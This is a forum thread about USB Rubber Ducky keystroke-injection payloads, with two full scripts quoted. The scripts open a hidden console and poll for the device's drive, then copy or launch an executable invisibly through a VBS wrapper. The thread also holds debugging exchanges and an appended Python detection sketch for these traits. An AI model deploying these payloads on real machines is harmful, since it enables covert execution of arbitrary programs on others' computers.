freeze Posted May 21, 2015

I bought it yesterday... and I need help. How do I do this with this USB: copy *.exe to (for example: C:\1.exe) and run 1.exe. How? Thanks.

Rkiver Posted May 21, 2015

A very quick google shows the following:

https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---copy-file-to-desktop

REM Author: overwraith
REM Name: CopyFileToDesktop.txt
REM Purpose: Wait for ducky mass storage to mount, then copy file to desktop.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 75
DELAY 3000
GUI r
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
ENTER
STRING if Exist %DUCKYdrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
REM Remove the next two lines if you don't place your payloads in separate folders.
STRING set DUCKYdrive=%DUCKYdrive%\CopyFileToDesktop\
ENTER
STRING copy %DUCKYdrive%HelloWorld.exe %userprofile%\Desktop\HelloWorld.exe
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER

freeze Posted May 22, 2015 Author

What is the problem?

freeze Posted May 28, 2015 Author

Use script:

REM Author: overwraith
REM Name: RunEXE_V2.txt
REM Purpose: Run an executable file off of the SD card after it mounts. Uses googleknowsbest's slightly more portable method to find the "Ducky" drive.
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 75
DELAY 3000
GUI r
DELAY 1000
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
ENTER
STRING if Exist %DUCKYdrive% (
ENTER
STRING goto :break
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
STRING goto :while1
ENTER
STRING :break
ENTER
REM Continue script.
STRING START %DUCKYdrive%\HelloWorld.exe
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL Z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
REM STRING EXIT
REM ENTER

And nothing happens ...

freeze Posted June 2, 2015 Author

What is the problem with this script?

C:\Documents and Settings\Administrator>CD %TEMP%

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>erase /Q DuckyWait.bat

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>copy con DuckyWait.bat
:while1
for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)
if Exist %DUCKYdrive% (
goto :break
)
timeout /t 30
goto :while1
:break
START %DUCKYdrive%\HelloWorld.exe
^Z
        1 file(s) copied.

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>DuckyWait.bat
The syntax of the command is incorrect.

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>

barry99705 Posted June 5, 2015

Looks like it doesn't like something in the batch file.

freeze Posted June 5, 2015 Author

What I understand from the answer of the console. I tried all the autorun options. No results. Specifically, it does not copy a file from a flash card to the PC.

freeze Posted June 6, 2015 Author

Answers? How to copy a file from the ducky? Not one of the scripts does it ..

fugu Posted June 6, 2015

Maybe just try part of the script, without running the duckyscript, but from the cmd line.

echo list volume ^| diskpart ^| findstr "DUCKY"

I think this should display the usb drive info for the ducky when the ducky is plugged in. Can you verify?

freeze Posted June 9, 2015 Author

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>echo list volume ^| diskpart ^| findstr "DUCK
Y"
list volume | diskpart | findstr "DUCKY"

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>

overwraith Posted June 9, 2015

I am not sure quite what is wrong, this works on everybody else's computers, but I have some ideas on what could be wrong. I have had instances where websites and forums etc. will add newline characters where there shouldn't be any. Make sure that there are no newline characters where there shouldn't be. My lines in my scripts tend to be very long due to the fact that there needs to be an inherent complexity in batch in order to get the same functionality of better programming languages which are unavailable to duckys.

Additionally go through the script and the actual output line by line and check to make sure that the script matches up with the actual output, if characters are being skipped then you should be able to see them. A lot of ducky-ing is just debugging.

One additional thing that could be happening is that you might not have the correct firmware installed. This script is supposed to run "silently" once the payload has been typed in, so it will wait silently until the drive with the file to copy is plugged in. If you don't have the correct firmware installed on your ducky, then the ducky will not mount the SD, which means the script will essentially run silently forever.

If anything else comes to mind I will post back.

fugu Posted June 10, 2015

I think you may be on to something with copy + paste. Maybe just try typing the command on the command line

diskpart list volume

(I think that's right?)

freeze Posted June 10, 2015 Author

I think you may be on to something with copy + paste. Maybe just try typing the command on the command line diskpart list volume(i think that's right?)

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>diskpart list volume

Microsoft DiskPart version 5.1.3565

Copyright (C) 1999-2003 Microsoft Corporation.
On computer: FFA2

DiskPart was unable to process the parameters.
Use 'diskpart /?' for more information.

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>

overwraith Posted June 10, 2015

Actually I think the echo is important, I don't think you can send parameters to diskpart like "list" and "volume".

echo list volume | diskpart

freeze Posted June 11, 2015 Author

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>echo list volume | diskpart

Microsoft DiskPart version 5.1.3565

Copyright (C) 1999-2003 Microsoft Corporation.
On computer: FFA2

DISKPART>
  Volume ###  Ltr  Label        Fs     Type        Size     Status     Info
  ----------  ---  -----------  -----  ----------  -------  ---------  --------
  Volume 0     D                       CD-ROM          0 B
  Volume 1     C                NTFS   Partition     64 GB  Healthy    System

DISKPART>

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp>

overwraith Posted June 11, 2015

In your output diskpart says that the ducky is not connected. Make sure you have the right firmware installed, you need twin duck or something in order for this to work and copy the file to the host computer (I don't remember which of the twin ducks you need, try both of em, takes several seconds to mount the SD). You see, twin duck firmware allows the ducky to mount the micro SD card as mass storage, and simultaneously type like a keyboard, it does not come on the ducky standard. Alternatively you could provide your own flash drive, label it "DUCKY" and put the exe's you want to copy on the flash drive.

Here is where a lot of the firmware looks like it is, I used to get it at ducky decode, but it looks like it has been moved to github.

https://github.com/midnitesnake/usb-rubber-ducky

Here is something on flashing the ducky, can't find the handy dandy word doc that midnight snake made;

https://github.com/midnitesnake/USB-Rubber-Ducky/wiki/Flashing-ducky

In the "CopyFileToDesktop.txt" script it assumes that you want to put your exes in a specific folder on your flash drive/ducky micro SD. Pay particular attention to these particular lines of the script.

REM Remove the next two lines if you don't place your payloads in separate folders.
STRING set DUCKYdrive=%DUCKYdrive%\CopyFileToDesktop\
ENTER
STRING copy %DUCKYdrive%HelloWorld.exe %userprofile%\Desktop\HelloWorld.exe
ENTER

The reason for a lot of the bulk in the script is that you don't necessarily know how long it will take for the ducky to mount the micro sd, so you actually have to wait for it to be connected, essentially polling for it. I think that this problem used to be a lot worse than it is right now, something appears to have gotten faster, or perhaps my computer upgrade has sped things up, I am not sure. There could have been tweaks to the ducky firmware, I am not sure. It at least seems to me that the problem was a lot worse when I was actually coding this script.

Of course you will actually have to modify the copy command in the script to reflect the exe names/exe group, as well as the folder name you decide to stick them in. Pay particular attention to the first line of the previous snippet if you want to place them in a specific folder as you will have to modify the script a little bit.

"STRING set DUCKYdrive=%DUCKYdrive%\CopyFileToDesktop\"

Edited June 11, 2015 by overwraith
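
Added example, not written by anyone in this thread: a defender-side sketch in Python that looks for the command-line traits of the scripts quoted above (the quiet `cmd ... /K` console, `wscript.exe` starting a batch file through a `.vbs` launcher, and the piped `echo list volume | diskpart` drive poll) and alerts only when several of them appear on one host within a short window. The record layout, host names, rule names and the 5-minute window are assumptions, and the sample records are constructed.

```python
import re
from datetime import datetime, timedelta

# Command-line traits taken from the scripts quoted in this thread.
RULES = {
    "quiet_cmd_k": re.compile(r"\bcmd(\.exe)?\b.*/Q\b.*/T:[0-9A-F]{2}\b.*/K\b", re.I),
    "wscript_runs_batch": re.compile(r"\bwscript(\.exe)?\b.*\.vbs\b.*\.(bat|cmd)\b", re.I),
    "piped_diskpart_poll": re.compile(r"echo\s+list\s+volume\s*\|\s*diskpart", re.I),
}

# Constructed sample records (host, timestamp, command line); not real logs.
EVENTS = [
    ("WS01", "2015-06-11T09:00:03", "cmd /Q /D /T:7F /F:OFF /V:ON /K"),
    ("WS01", "2015-06-11T09:00:21", "wscript.exe invis.vbs DuckyWait.bat"),
    ("WS01", "2015-06-11T09:00:22", 'cmd.exe /c echo list volume | diskpart | findstr "DUCKY"'),
    ("WS02", "2015-06-11T09:05:00", "cmd.exe /K cd C:\\build"),              # matches no rule
    ("WS02", "2015-06-11T09:30:00", "diskpart"),                              # matches no rule
    ("WS03", "2015-06-11T08:00:00", "wscript.exe logon.vbs mapdrives.bat"),  # one rule only
    ("WS03", "2015-06-11T11:00:00", "cmd.exe /c echo list volume | diskpart"),  # hours later
]

def rule_hits(events):
    """Map host -> time-sorted list of (timestamp, rule name) for matching lines."""
    hits = {}
    for host, ts, cmd in events:
        for name, rx in RULES.items():
            if rx.search(cmd):
                hits.setdefault(host, []).append((datetime.fromisoformat(ts), name))
    return {host: sorted(found) for host, found in hits.items()}

def correlate(events, window=timedelta(minutes=5), min_rules=2):
    """Alert on hosts where min_rules distinct rules fire inside one window."""
    alerts = {}
    for host, found in rule_hits(events).items():
        for start, _ in found:
            names = {n for t, n in found if start <= t <= start + window}
            if len(names) >= min_rules:
                alerts[host] = sorted(names)
                break
    return alerts

if __name__ == "__main__":
    for host, names in correlate(EVENTS).items():
        print(host, "->", ", ".join(names))
```

Requiring two or more rules inside the window keeps a lone logon script or a one-off diskpart query, as on WS03, from raising an alert.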